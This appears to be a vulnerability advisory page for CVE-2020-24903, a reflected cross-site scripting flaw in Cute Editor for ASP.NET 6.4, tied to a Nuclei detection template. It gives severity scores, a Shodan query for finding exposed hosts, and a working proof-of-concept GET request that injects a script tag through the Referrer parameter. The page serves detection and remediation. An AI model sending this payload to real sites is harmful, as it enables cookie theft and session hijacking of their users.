| Title | Cute Editor for ASP.NET 6.4 - Cross-Site Scripting |
|---|---|
| Author | edoardottt |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. |
| Remediation | Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. |
| CVSS Score | 6.1 |
| EPSS Score | 0.05233 |
| CVE ID | CVE-2020-24903 |
| CWE ID | CWE-79 |
| Shodan Query | http.component:"ASP.NET"http.component:"asp.net" |
| Tags | cve cve2020 cuteeditor xss seclists cutesoft asp.net vuln |
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24903.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-24903.pcap
N/AN/A